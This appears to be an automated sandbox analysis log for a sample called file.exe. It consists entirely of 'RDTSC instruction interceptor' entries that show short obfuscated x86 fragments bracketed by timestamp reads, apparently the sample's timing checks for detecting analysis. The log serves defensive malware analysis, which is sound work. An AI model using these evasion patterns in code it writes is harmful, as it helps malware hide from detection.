Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24CCA second address: F24CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E68 second address: F24E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E6C second address: F24E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0154ECB876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E78 second address: F24E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0154ED0536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E82 second address: F24E8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0154ECB876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E8C second address: F24E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E9B second address: F24EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007F0154ECB87Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2D05C second address: F2D060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2D060 second address: F2D066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B262 second address: F2B2DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F0154ED053Ch 0x0000000f jmp 00007F0154ED0547h 0x00000014 jmp 00007F0154ED0549h 0x00000019 popad 0x0000001a pushad 0x0000001b push edx 0x0000001c jc 00007F0154ED0536h 0x00000022 pop edx 0x00000023 jmp 00007F0154ED0544h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jmp 00007F0154ED053Eh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B2DE second address: F2B2E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B43E second address: F2B444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B444 second address: F2B44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B44F second address: F2B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2B45B second address: F2B477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0154ECB87Dh 0x0000000b pushad 0x0000000c jp 00007F0154ECB876h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2C105 second address: F2C10E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F32A38 second address: F32A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F32A3E second address: F32A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED0543h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0154ED0536h 0x00000012 jmp 00007F0154ED0544h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42C43 second address: F42C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42C47 second address: F42C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0154ED0538h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0154ED053Eh 0x00000013 jbe 00007F0154ED0536h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42DA6 second address: F42DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42DAA second address: F42DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0154ED054Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F46700 second address: F46704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F46704 second address: F46724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0154ED053Eh 0x0000000c jnc 00007F0154ED0536h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F46724 second address: F46728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55853 second address: F55859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DE42 second address: F5DE5B instructions: 0x00000000 rdtsc 0x00000002 je 00007F0154ECB876h 0x00000008 jp 00007F0154ECB876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jno 00007F0154ECB876h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DE5B second address: F5DE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CB81 second address: F5CB87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CB87 second address: F5CBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnl 00007F0154ED0536h 0x0000000f pop ecx 0x00000010 jmp 00007F0154ED053Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F0154ED0536h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CBAE second address: F5CBC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB887h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CBC9 second address: F5CBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0154ED0544h 0x0000000e jns 00007F0154ED0547h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CBFD second address: F5CC11 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0154ECB87Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0154ECB876h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5CFFB second address: F5D001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D001 second address: F5D005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D005 second address: F5D04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0154ED053Ah 0x00000011 jnc 00007F0154ED0536h 0x00000017 pop eax 0x00000018 jno 00007F0154ED054Eh 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60B9A second address: F60BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60BA3 second address: F60BAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60BAD second address: F60BB7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0154ECB87Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F608E2 second address: F608E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BBC6 second address: F6BBCB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BBCB second address: F6BBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7199A second address: F7199E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7199E second address: F719A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F719A4 second address: F719AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F719AE second address: F719DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F0154ED0536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F0154ED0542h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F0154ED0536h 0x0000001a jne 00007F0154ED0536h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F719DA second address: F719DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F702F3 second address: F702F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7F3A5 second address: F7F3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7F3A9 second address: F7F3BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0154ED0536h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7F3BB second address: F7F3C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0154ECB876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8421F second address: F84230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F0154ED0536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DB60 second address: F9DB85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0154ECB876h 0x00000009 jng 00007F0154ECB876h 0x0000000f jmp 00007F0154ECB882h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DB85 second address: F9DBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0154ED0536h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0154ED0542h 0x00000014 push edi 0x00000015 jng 00007F0154ED0536h 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9DBAE second address: F9DBBA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0154ECB87Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9C991 second address: F9C995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CC41 second address: F9CC6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB883h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0154ECB880h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CC6A second address: F9CC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0154ED0546h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CDF1 second address: F9CE25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB888h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0154ECB886h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CF7E second address: F9CF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CF87 second address: F9CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9CF8B second address: F9CF96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D2B6 second address: F9D2C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0154ECB876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D2C0 second address: F9D2E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F0154ED054Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D2E7 second address: F9D2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D2EB second address: F9D2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D2EF second address: F9D2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9D441 second address: F9D469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0154ED0544h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F0154ED0536h 0x00000013 jng 00007F0154ED0536h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0774 second address: FA07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F0154ECB885h 0x00000010 jmp 00007F0154ECB87Fh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a jmp 00007F0154ECB87Eh 0x0000001f pop eax 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F0154ECB87Ah 0x00000029 jng 00007F0154ECB876h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA07CB second address: FA07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F0154ED053Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA07EF second address: FA07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA07F3 second address: FA080E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0154ED0546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0A79 second address: FA0A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0A83 second address: FA0A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0A87 second address: FA0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 js 00007F0154ECB87Ch 0x0000000e push dword ptr [ebp+122D34ADh] 0x00000014 mov dword ptr [ebp+122D23E4h], esi 0x0000001a call 00007F0154ECB879h 0x0000001f jmp 00007F0154ECB886h 0x00000024 push eax 0x00000025 jno 00007F0154ECB884h 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007F0154ECB87Ch 0x00000037 jc 00007F0154ECB876h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0AED second address: FA0B2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F0154ED0536h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jno 00007F0154ED0540h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jno 00007F0154ED0536h 0x00000021 jmp 00007F0154ED0543h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3CD1 second address: FA3CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0154ECB876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3CDB second address: FA3CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0154ED0536h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA58C8 second address: FA58E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F0154ECB883h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA58E2 second address: FA58EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA58EA second address: FA58EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA58EE second address: FA5938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F0154ED0543h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F0154ED054Fh 0x00000017 jmp 00007F0154ED053Ah 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA5938 second address: FA5944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0154ECB876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0D5C second address: 4DF0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0D6B second address: 4DF0D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0D71 second address: 4DF0DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0154ED0546h 0x00000011 push eax 0x00000012 jmp 00007F0154ED053Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0154ED053Bh 0x0000001f or ecx, 0E2428EEh 0x00000025 jmp 00007F0154ED0549h 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0154ED053Dh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0DD6 second address: 4DE0E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0154ECB87Bh 0x00000013 sub ecx, 0355874Eh 0x00000019 jmp 00007F0154ECB889h 0x0000001e popfd 0x0000001f mov ch, 6Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0E18 second address: 4DE0E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0E2C second address: 4DE0E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E30081 second address: 4E30087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E30087 second address: 4E30098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB87Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E30098 second address: 4E300DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0154ED0546h 0x00000015 add ax, CD08h 0x0000001a jmp 00007F0154ED053Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E300DC second address: 4E3012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0154ECB87Fh 0x00000009 sbb ah, 0000004Eh 0x0000000c jmp 00007F0154ECB889h 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0154ECB888h 0x0000001f rdtsc
